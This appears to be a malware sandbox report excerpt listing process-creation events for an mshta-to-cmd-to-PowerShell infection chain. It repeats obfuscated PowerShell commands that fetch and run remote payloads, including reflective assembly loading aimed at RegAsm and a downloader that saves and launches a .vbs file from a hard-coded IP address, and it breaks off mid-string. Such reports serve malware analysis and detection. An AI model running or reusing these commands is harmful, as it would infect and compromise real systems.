                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhG